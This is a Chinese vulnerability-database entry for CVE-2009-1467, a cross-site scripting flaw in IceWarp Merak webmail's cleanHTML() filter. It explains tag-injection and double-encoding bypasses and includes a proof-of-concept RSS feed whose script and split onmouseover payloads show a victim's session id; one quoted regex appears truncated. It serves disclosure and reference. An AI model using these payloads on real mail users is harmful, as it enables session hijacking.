Icewarp Merak邮件服务器cleanHTML()函数跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117705 漏洞类型 跨站脚本
发布时间 2009-05-05 更新时间 2009-05-06
CVE编号 CVE-2009-1467 CNNVD-ID CNNVD-200905-049
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32985
https://www.securityfocus.com/bid/34823
https://cxsecurity.com/issue/WLB-2009050109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-049
|漏洞详情
MerakEmailServer是一个全面的办公室局域网或Internet通讯邮件解决方案。为了防止在HTML邮件中执行JavaScript和VBScript代码并过滤掉不希望的HTML标签,Merak邮件服务器WebMail模块的cleanHTML()函数会对HTML邮件执行过滤。从462行到482行,cleanHTML()函数删除或更改了各种恶意关键字,包括删除所有以on开始的属性(如onmouseover、onload等),并将javascript和vbscript重写为noscript。之后在485行,cleanHTML()函数彻底的删除了邮件中的各种HTML标签:$string=preg_replace('frame|frameset|ilayer|layer|bgsound)[^>]*>#i',"",$string);在之前过滤掉的关键字之间注入这些HTML标签,cleanHTML()函数就无法识别,之后该函数删除HTML标签时关键字会再次生效。另外一种绕过过滤的方法是使用16进制的HTML实体。cleanHTML()函数在459行对输入字符串进行一次解码:$string=html_entity_decode($string,ENT_COMPAT,"UTF-8");通过双重编码输入,所有用于过滤的正则表达式在第一次解码后也无法识别出恶意的内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/34825/info

IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting</title>
    <link
      href="http://www.example.come"
      rel="self"
      type="application/rss+xml" />
    <link>http://www.example.come</link>
    <description>Seeing your network from the attacker's perspective</description>
    <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
    <language>de</language>
    <item>
      <title><script>alert('Title: Your session id is: ' +
window.top.sSID);</script></title>
      <link>http://www.example.come/pentest</link>
      <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
      <description>
        <div o<xml>nmouseover="alert('Description: Your session id is: ' +
window.top.sSID)">
          RedTeam Pentesting XSS
        </div>
      </description>
    </item>
  </channel>
</rss>
|受影响的产品
IceWarp Merak Mail Server 9.4.1
|参考资料

来源:MISC
链接:http://www.redteam-pentesting.de/advisories/rt-sa-2009-002
来源:XF
名称:merak-webmail-xss(50331)
链接:http://xforce.iss.net/xforce/xfdb/50331
来源:VUPEN
名称:ADV-2009-1253
链接:http://www.vupen.com/english/advisories/2009/1253
来源:SECTRACK
名称:1022168
链接:http://www.securitytracker.com/id?1022168
来源:SECTRACK
名称:1022167
链接:http://www.securitytracker.com/id?1022167
来源:BID
名称:34825
链接:http://www.securityfocus.com/bid/34825
来源:BUGTRAQ
名称:20090505[RT-SA-2009-002]IceWarpWebMailServer:User-assistedCrossSiteScriptinginRSSFeedReader
链接:http://www.securityfocus.com/archive/1/archive/1/503229/100/0/threaded
来源:BUGTRAQ
名称:20090505[RT-SA-2009-001]IceWarpWebMailServer:CrossSiteScriptinginEmailView
链接:http://www.securityfocus.com/archive/1/archive/1/503225/100/0/threaded
来源:MISC
链接:http://www.redteam-pentesting.de/advisories/rt-sa-2009-001
来源:OSVDB
名称:54227
链接:http://osvdb.org/54227
来源:OSVDB
名称:54226
链接:http://osvdb.org/54226